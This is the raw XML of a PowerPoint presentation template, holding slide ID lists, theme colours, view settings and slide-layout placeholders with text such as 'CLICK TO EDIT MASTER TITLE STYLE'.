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35" r:id="rId3"/>
    <p:sldId id="568" r:id="rId4"/>
    <p:sldId id="573" r:id="rId5"/>
    <p:sldId id="310" r:id="rId6"/>
    <p:sldId id="311" r:id="rId7"/>
    <p:sldId id="437" r:id="rId8"/>
    <p:sldId id="323" r:id="rId9"/>
    <p:sldId id="355" r:id="rId10"/>
    <p:sldId id="574" r:id="rId11"/>
    <p:sldId id="292" r:id="rId12"/>
    <p:sldId id="577" r:id="rId13"/>
    <p:sldId id="586" r:id="rId14"/>
    <p:sldId id="576" r:id="rId15"/>
    <p:sldId id="578" r:id="rId16"/>
    <p:sldId id="325" r:id="rId17"/>
    <p:sldId id="324" r:id="rId18"/>
    <p:sldId id="380" r:id="rId19"/>
    <p:sldId id="327" r:id="rId20"/>
    <p:sldId id="329" r:id="rId21"/>
    <p:sldId id="328" r:id="rId22"/>
    <p:sldId id="330" r:id="rId23"/>
    <p:sldId id="382" r:id="rId24"/>
    <p:sldId id="332" r:id="rId25"/>
    <p:sldId id="579" r:id="rId26"/>
    <p:sldId id="570" r:id="rId27"/>
    <p:sldId id="571" r:id="rId28"/>
    <p:sldId id="572" r:id="rId29"/>
    <p:sldId id="581" r:id="rId30"/>
    <p:sldId id="582" r:id="rId31"/>
    <p:sldId id="583" r:id="rId32"/>
    <p:sldId id="584" r:id="rId33"/>
    <p:sldId id="415" r:id="rId34"/>
    <p:sldId id="580" r:id="rId35"/>
    <p:sldId id="314" r:id="rId36"/>
    <p:sldId id="378" r:id="rId37"/>
    <p:sldId id="346" r:id="rId38"/>
    <p:sldId id="349" r:id="rId39"/>
    <p:sldId id="357" r:id="rId40"/>
    <p:sldId id="417" r:id="rId41"/>
    <p:sldId id="585" r:id="rId42"/>
    <p:sldId id="348" r:id="rId43"/>
    <p:sldId id="587" r:id="rId44"/>
    <p:sldId id="438" r:id="rId45"/>
    <p:sldId id="381" r:id="rId46"/>
    <p:sldId id="364" r:id="rId47"/>
    <p:sldId id="369" r:id="rId48"/>
    <p:sldId id="353" r:id="rId49"/>
    <p:sldId id="440" r:id="rId50"/>
    <p:sldId id="366" r:id="rId51"/>
    <p:sldId id="368" r:id="rId52"/>
    <p:sldId id="354" r:id="rId5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00"/>
    <a:srgbClr val="961B81"/>
    <a:srgbClr val="003865"/>
    <a:srgbClr val="C0C0C0"/>
    <a:srgbClr val="F2F2F2"/>
    <a:srgbClr val="EAEAEA"/>
    <a:srgbClr val="787878"/>
    <a:srgbClr val="FBFBFB"/>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3883" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="63" d="100"/>
          <a:sy n="63" d="100"/>
        </p:scale>
        <p:origin x="612" y="64"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>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5AE1-1D5F-483D-90B5-92A2A708F59B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2018-10-03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19B2B-FBA9-4EA3-BAD3-94A21FB4DC70}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15809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JU Intro">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="787878"/>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2018-10-03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pic>
        <p:nvPicPr>
          <p:cNvPr id="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029" y="2514600"/>
            <a:ext cx="3295941" cy="1834462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1051800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3843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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12"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55688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72200" y="802696"/>
            <a:ext cx="5181600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="787878"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="2338141"/>
            <a:ext cx="5181600" cy="3838821"/>
          </a:xfrm>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1" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="476093"/>
            <a:ext cx="5194300" cy="5369844"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="787878"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12"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842880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fo boxes rectang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97247"/>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819472"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">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021952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fo boxes rectangle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175275"/>
            <a:ext cx="4489502" cy="3767019"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">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4489200" cy="3789244"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">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150092" y="2467261"/>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990248" y="2467260"/>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73454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fo boxes teardrop">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50092" y="1175275"/>
            <a:ext cx="3798000" cy="3797247"/>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chemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="4000" cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="787878"/>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1084977" y="2817853"/>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7854"/>
            <a:ext cx="4051660" cy="3021879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="78787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4"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5"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61254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fo boxes teardrop Whit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112" y="1175274"/>
            <a:ext cx="3798000" cy="3798000"/>
          </a:xfrm>
          <a:prstGeom prst="teardrop">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="939393"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="4000" cap="all" baseline="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6755980" y="1153050"/>
            <a:ext cx="3798000" cy="3798000"/>
          </a:xfrm>
          <a:prstGeom prst="teardrop">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="787878"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="4000" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="893997" y="2818606"/>
            <a:ext cx="3928230" cy="3021879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2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3" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629150" y="2818606"/>
            <a:ext cx="4051660" cy="3021879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2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1"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6"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025033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2018-10-03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1742360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Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{428859CC-B640-4DB3-BB6F-301CDED75AAD}" type="datetimeFigureOut">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>2018-10-03</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229799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2018-10-03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01922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rt Grey">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="787878"/>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079" y="1122363"/>
            <a:ext cx="11501792" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="6000"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Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408079" y="3602038"/>
            <a:ext cx="11501792" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2400">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2018-10-03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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11"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150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hite">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59CC-B640-4DB3-BB6F-301CDED75AAD}" type="datetimeFigureOut">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>2018-10-03</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50AA12D1-4D5F-4C8C-82B1-BE6DCCEF57B9}" type="slidenum">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="sv-SE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7"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19627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46065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0700" y="476093"/>
            <a:ext cx="11132232" cy="5369844"/>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2548947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out bor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6745495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without border White">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92000" cy="5845937"/>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8"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98182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Orange">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="FFB500"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408079" y="1122363"/>
            <a:ext cx="11501792" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="6000" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408079" y="3602038"/>
            <a:ext cx="11501792"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34557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Whit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8859CC-B640-4DB3-BB6F-301CDED75AAD}" type="datetimeFigureOut">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>2018-10-03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sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408079" y="1122363"/>
            <a:ext cx="11501792" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="6000" cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="787878"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408079" y="3602038"/>
            <a:ext cx="11501792" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="7878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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Rak 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="475096"/>
            <a:ext cx="11389171" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="787878"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10"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1010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Blue">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="003865"/>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2018-10-03</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26479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urple">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="961B8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08079" y="1122363"/>
            <a:ext cx="11501792" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="6000" cap="all" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408079" y="3602038"/>
            <a:ext cx="1150179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sv-SE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{428859CC-B640-4DB3-BB6F-301CDED75AAD}" type="datetimeFigureOut">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>2018-10-03</a:t>
            </a:fld>
            <a:endParaRPr lang="sv-SE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="6356350"/>
            <a:ext cx="4114800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="sv-SE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{50AA12D1-4D5F-4C8C-82B1-BE6DCCEF57B9}" type="slidenum">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="sv-SE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Rak 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="475096"/>
            <a:ext cx="11389171"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37811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2018-10-03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10"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78373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solidFill>
                  <a:srgbClr val="787878"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="787878"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="787878"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="787878"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="787878"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="78787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10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{428859CC-B640-4DB3-BB6F-301CDED75AAD}" type="datetimeFigureOut">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>2018-10-03</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50AA12D1-4D5F-4C8C-82B1-BE6DCCEF57B9}" type="slidenum">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="sv-SE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Rak 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="6566233"/>
            <a:ext cx="8957023"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7"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128319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all" baseline="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838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Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1825625"/>
            <a:ext cx="51816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5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{428859CC-B640-4DB3-BB6F-301CDED75AAD}" type="datetimeFigureOut">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>2018-10-03</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50AA12D1-4D5F-4C8C-82B1-BE6DCCEF57B9}" type="slidenum">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="sv-SE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Rak 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="6566233"/>
            <a:ext cx="8957023"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Bildobjekt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258" y="6361859"/>
            <a:ext cx="2022742" cy="319178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2475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878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sv-S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sv-S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859CC-B640-4DB3-BB6F-301CDED75AAD}" type="datetimeFigureOut">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>2018-10-03</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A12D1-4D5F-4C8C-82B1-BE6DCCEF57B9}" type="slidenum">
              <a:rPr lang="sv-SE" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="sv-SE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1054189662"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483688" r:id="rId1"/>
    <p:sldLayoutId id="2147483649" r:id="rId2"/>
    <p:sldLayoutId id="2147483674" r:id="rId3"/>
    <p:sldLayoutId id="2147483681" r:id="rId4"/>
    <p:sldLayoutId id="2147483673" r:id="rId5"/>
    <p:sldLayoutId id="2147483672" r:id="rId6"/>
    <p:sldLayoutId id="2147483650" r:id="rId7"/>
    <p:sldLayoutId id="2147483682" r:id="rId8"/>
    <p:sldLayoutId id="2147483652" r:id="rId9"/>
    <p:sldLayoutId id="2147483683" r:id="rId10"/>
    <p:sldLayoutId id="2147483689" r:id="rId11"/>
    <p:sldLayoutId id="2147483690" r:id="rId12"/>
    <p:sldLayoutId id="2147483675" r:id="rId13"/>
    <p:sldLayoutId id="2147483676" r:id="rId14"/>
    <p:sldLayoutId id="2147483686" r:id="rId15"/>
    <p:sldLayoutId id="2147483687" r:id="rId16"/>
    <p:sldLayoutId id="2147483654" r:id="rId17"/>
    <p:sldLayoutId id="2147483684" r:id="rId18"/>
    <p:sldLayoutId id="2147483655" r:id="rId19"/>
    <p:sldLayoutId id="2147483685" r:id="rId20"/>
    <p:sldLayoutId id="2147483677" r:id="rId21"/>
    <p:sldLayoutId id="2147483678" r:id="rId22"/>
    <p:sldLayoutId id="2147483680" r:id="rId23"/>
